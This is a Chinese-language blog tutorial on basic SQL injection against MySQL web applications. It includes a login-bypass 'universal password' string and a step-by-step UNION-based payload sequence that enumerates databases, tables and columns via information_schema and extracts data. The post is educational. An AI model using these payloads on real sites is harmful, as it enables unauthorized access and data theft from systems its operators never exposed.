SQL注入基本原理

最新推荐文章于 2024-04-29 19:28:06 发布
最新推荐文章于 2024-04-29 19:28:06 发布
阅读量3k 收藏 21
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DM766924/article/details/120211607
版权

SQL注入基础原理:

1)SQL注入概念及产生原因:

当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。

2)SQL注入的本质:

把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则

3)SQL注入的两个关键点:

1,用户能控制输入的内容; 2,web应用把用户输入的内容带入到数据库执行;

SQL注入基础危害:

)盗取网站的敏感信息;

)绕过网站后台认证 后台登录语句: SELECT * FROM admin WHERE Username=‘user’ and Password=‘pass’ 万能密码:‘or ’1‘ = ’1‘ # ;

)借助SQL注入漏洞提权获取系统权限;

)读取文件信息。

MYSQL数据库注入-常用函数:

(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本

SQL(联合)注入流程:

?id=1 and 1=1

1、判断有无闭合 and 1=1 and 1=2 //结果和第一个一样说明需要闭合,反之无闭合 有闭合则需要用到 --+闭合

2、猜解字段 order by 10 //采用二分法 3、判断数据回显位置 -1 union select 1,2,3,4,5.... //参数等号后面加-表示不显示当前数据 4、获取当前数据库名、用户、版本 union select version(),database(),user(),4...... 4、获取全部数据库名

union select 1,2,(select group_concat(schema_name)from information_schema.schemata)

5、获取表名 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='库名'

6、获取字段名 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='表名'

7、获取数据 union select 1,2,(select group_concat(字段1,字段2)from 库名.表名

函数名称:     函数功能:

 查 库:          select schema_name from information_schema.schema

 查 表:          select table_name from information_schema.tables where table_schema=库名

 查 列:          select column_name from information_schema.columns where table_name=表名

查数据:        select 列名 from 库名.表名

总结--普通SQL注入必备条件:

1、界面能够回显数据库查询到的数据(必要条件);

2、界面回显内容至少能够显示数据库中的某列数据(必要条件);

3、部分能够直接提供数据库报错内容的回显;

DM啊瑶
关注
  • 0
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入原理
10-28
sql注入原理!!!!
SQL注入之基础原理
longtangbin的博客
10-15 5816
SQL注入之基础原理 一、SQL注入的产生 SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 二、SQL注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,
【网络安全---sql注入(1)】你知道什么是SQL注入吗?知道如何通过SQL注入来控制目标服务器吗?一篇文章教你sql注入漏洞的原理及方法
m0_67844671的博客
09-19 746
SQL注入漏洞详解。包括原理,分类比如数字型,字符型,搜索型,xx型,宽字节注入,报错注入,盲注,有无回显等,各种注入payload以及产生原因等等
sql注入攻击原理
完颜振江
03-01 865
应用程序在未正确过滤或者验证用户输入数据的情况下,将恶意的 SQL 查询与应用程序原本的查询逻辑组合在一起,并发送到后端数据库服务器执行。SQL 注入攻击是一种常见的网络安全攻击,利用了应用程序对用户输入数据的不正确处理,导致恶意用户能够在 SQL 查询中插入恶意的 SQL 代码,以执行未经授权的数据库操作。总是为真,因此查询语句的条件总是为真,无论密码是什么,都将返回一个用户记录,从而绕过了身份验证,使攻击者成功登录到系统中。:定期监控应用程序的数据库活动,并记录潜在的 SQL 注入攻击尝试。
SQL注入】(1)原理,框架
09-25 3129
SQL注入】基础知识
SQL注入原理以及预防措施
清风皓月长歌
02-01 3906
1、SQL注入原理 就是通过利用一些查询语句的漏洞,将SQL语句传递到服务器解析并执行的一种攻击手段。SQL注入是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,...
sql注入原理以及防范
june_young_fan的博客
04-10 1306
前言 看到一篇不错的文章,特意学习并整理记录了下来,便于自己和广大网友查阅。 一、Sql注入简介 Sql注入攻击是通过将恶意的Sql查询或添加语句插入到应用的输入参数中,再在后台Sql服务器上解析执行进行的攻击,它目前是黑客对数据库进行攻击的最常用手段之一。 二、Web程序三层架构 三层架构(3-tier architecture)通常意义上就是将整个业务应用划分为: 界面层(User Inte...
sql注入基本原理1
Daniel的博客
09-08 512
进入 SQL injection页面开始注入: 先输入 1 ,查看回显 (URL中ID=1,说明php页面通过get方法传递参数): 那实际上后台执行了什么样的Sql语句呢?点击 view source查看源代码 : 可以看到,实际执行的Sql语句是: SELECT first_name, last_name FROM users WHERE user_id = '1';
SQL注入原理
热门推荐
qq_44754481的博客
03-17 1万+
一、SQL注入原理 SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 产生原因: 产生原因是程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。 二、相关技术原理SQL注入可以分为平台层注入和代码注入。前者是由不安全...
第十八课-基于错误的sql注入基本原理与演示.ppt
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
SQL注入原理及PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
SQL注入攻击与防御
07-17
SQL注入是Internet上最危险、最有名的安全漏洞之一,《SQL...理解它是什么以及它的基本原理 查找、确认和自动发现SQL注入 查找代码中SQL注入时的提示和技巧 使用SQL注入创建利用 通过设计来避免由SQL攻击所带来的危险
SQL注入自学指南
09-11
习科论坛近几年关于SQL注入的精华帖,讲解SQL注入基本原理以及各种高级利用技巧 , 每个知识点均以实际例子作为示范。
SQL Server的基本操作示例
最新发布
weixin_58566539的博客
04-29 459
SQL Server的基本操作示例
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
keyboard专栏
04-28 397
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
SQL底层执行过程
qq_14886109的博客
04-28 807
SQL底层执行过程,INNODB,二阶段提交
SQL的基础语句
qq_51321722的博客
04-22 1530
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
web sql注入基本原理
03-29
Web SQL注入是一种常见的安全漏洞,攻击者通过在Web应用程序的输入字段中插入恶意的SQL代码,从而可以执行未经授权的数据库操作。其基本原理如下: 1. 用户输入:攻击者通过Web应用程序的输入字段(如表单、URL参数等)提交恶意的SQL代码。 2. SQL查询构造:攻击者的输入被拼接到SQL查询语句中,构成一个完整的恶意查询。 3. 恶意查询执行:Web应用程序将恶意查询发送到数据库服务器执行,而不对输入进行充分验证和过滤。 4. 数据库操作:数据库服务器执行恶意查询,可能导致数据泄露、数据篡改、服务器崩溃等安全问题。 为了防止Web SQL注入攻击,可以采取以下措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只接受合法的输入,并对特殊字符进行转义或编码。 2. 使用参数化查询或预编译语句:使用参数化查询或预编译语句可以将用户输入作为参数传递给SQL查询,而不是直接拼接到查询语句中,从而避免了注入攻击。 3. 最小权限原则:数据库用户应该具有最小的权限,只能执行必要的操作,以减少攻击者可能造成的损害。 4. 定期更新和维护:及时更新数据库软件和应用程序,修复已知的安全漏洞,以保持系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值